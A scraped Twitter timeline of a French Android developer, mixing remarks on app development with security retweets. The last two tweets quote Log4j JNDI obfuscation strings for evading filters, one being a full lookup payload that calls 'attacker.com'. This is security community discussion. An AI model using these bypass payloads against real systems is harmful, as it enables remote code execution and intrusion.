Daniel Fages

1.8K posts

Daniel Fages

Daniel Fages

@madCdan

AOSP

France Katılım Aralık 2011
718 Takip Edilen480 Takipçiler
Daniel Fages
Daniel Fages@madCdan·
@ValeryMarchive @najatvb Mine de rien, rechercher les erreurs de frappe dans le code copié depuis Hebdogiciel et comprendre pourquoi ça ne marchait pas m’a appris beaucoup de choses… mais bon, peut-être pas au point d’y retourner volontairement 😅
Français
0
0
1
24
Valéry Rieß-Marchive | @valerymarchive.bsky.social
@najatvb Dans les années 1980, il y avait un truc qui s'appelait #hebdogiciel, avec ses pages de code que plein de passionné(e)s passaient des heures à taper. Leur demander ce qu'ils pensent du papier et du crayon pour coder serait peut-être une bonne idée 🤷‍♂️
Français
1
0
3
271
Najat Vallaud-Belkacem
Najat Vallaud-Belkacem@najatvb·
Libérons-nous. Je sais que ce sujet est rarement abordé comme cela, mais avons nous vraiment envie de cette emprise d’Internet sur nos vies? Une invitation à y réfléchir. lefigaro.fr/vox/societe/na…
Français
1.9K
40
196
394.9K
Daniel Fages retweetledi
Francisco
Francisco@franciscof_1990·
New update for Home Agenda calendar widget. Primarily adds support for Android 12 and newer ⚠️ Also it's on a -50% sale until the end of the year! Like & reshare to help discoverability. play.google.com/store/apps/det…
English
5
9
35
6K
Daniel Fages retweetledi
Emilien Pecoul
Emilien Pecoul@Ouarzy·
Hello Twitter ! Est ce que j’ai dans mon réseau un #freelance qui s’y connaît en #graphql ? Merci 🙏
Français
0
6
1
1K
DevoxxFR
DevoxxFR@DevoxxFR·
Souci DNS corrigé (mais TTL assez long). Le site cfp.devoxx.fr est accessible à nouveau.
Français
1
0
3
0
Daniel Fages
Daniel Fages@madCdan·
Hey @virustotal it seems your API v2 is currently broken and always returned an HTTP 204 error ("You have reached your API quota limits") even if we're not over the quota. API v3 is OK. Could you please confirm ?
English
1
0
1
0
Daniel Fages retweetledi
iMil 🇪🇸🦇
iMil 🇪🇸🦇@iMilnb·
Salut mes followers, Je ne pense pas en avoir officiellement parlé ici, mais je suis désormais #freelance et interviens sur une variété de sujets infra/code, le site de ma boite est indalit.com et j'y résume mes technos de prédilection. RT fortement appréciés !
Français
1
60
18
0
Daniel Fages retweetledi
LunaSec (@lunasec@infosec.exchange)
We've published an analysis of the #Spring4Shell RCE to help provide better "facts" about what we know so far. There are 2 vulnerabilities and people are confusing them. Note: This post is Markdown on GitHub if you'd like to add anything (link in thread). lunasec.io/docs/blog/spri…
English
3
130
268
0
iMil 🇪🇸🦇
iMil 🇪🇸🦇@iMilnb·
Eh les lutins de l'embarqué, vous avez déjà fait booter un firmware genre de cam ip avec du qemu arm ?
Français
2
4
2
0
Daniel Fages
Daniel Fages@madCdan·
@edasfr Parce que, par définition, une application évolue au cours du temps et qu’en général les besoins se complexifient ; si, en plus, on veut une UX adaptée à iOS d’une part et Android d’autre part ça complique d’autant plus les choses.
Français
1
0
0
0
Daniel Fages
Daniel Fages@madCdan·
@edasfr Oui, développer un produit coûte (très) cher. Autant je comprends qu’on puisse partir sur ce genre de solutions web/js pour faire un PoC ou tester le marché, autant sur le moyen terme cela me paraît inapproprié (si on a pas les moyens faut arrêter le projet)
Français
0
0
0
0
Daniel Fages
Daniel Fages@madCdan·
@edasfr Peut-être mais quand je vois toutes les dépendances et la taille que font ce genre d’apps, je comprends pourquoi on retrouve maintenant 8Go de RAM dans les smartphones 😜
Français
0
0
0
0
Daniel Fages
Daniel Fages@madCdan·
@edasfr Est-ce que le problème n'est pas là justement ? Est-ce que ce n'est pas se mentir que de croire qu'on va faire une app optimisée et performante pour des plateformes complexes Android/iOS en ne maîtrisant "que" Web/JS ?
Français
0
0
0
0
Daniel Fages retweetledi
Genymotion
Genymotion@Genymotion·
You may have concerns if Log4j security vulnerability impacts our products 😱 We confirm that none of Genymotion products, SaaS or Device Image are impacted by this vulnerability 🦺
English
0
1
1
0
やまざきkei5
やまざきkei5@ymzkei5·
deobfuscate tool by madCdan : “it's possible to enable the real JNDI lookup by passing the "-X" parameter to JndiLookup ("-X" to be passed as the first parameter) ; PLEASE BE CAUTIOUS with this because it could lead to your system being compromised.”
Daniel Fages@madCdan

@ymzkei5 I wrote a small tool which deobfuscate log4j lookups, based on the actual code of log4j : github.com/madCdan/JndiLo…

English
1
0
1
0
やまざきkei5
やまざきkei5@ymzkei5·
There may be many ways to avoid detection :_( jndi: jn${env::-}di: jn${date:}di${date:':'} j${k8s:k5:-ND}i${sd:k5:-:} j${main:\k5:-Nd}i${spring:k5:-:} j${sys:k5:-nD}${lower:i${web:k5:-:}} j${::-nD}i${::-:} j${EnV:K5:-nD}i: j${loWer:Nd}i${uPper::} log4j bypass
English
5
127
429
0
Brandon Forbes
Brandon Forbes@Rezn0k·
If you're filtering on "ldap", "jndi", or the ${lower:x} method, I have bad news for you: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} This gets past every filter I've found so far. There's no shortage of these bypasses. #log4j
English
27
700
2.4K
0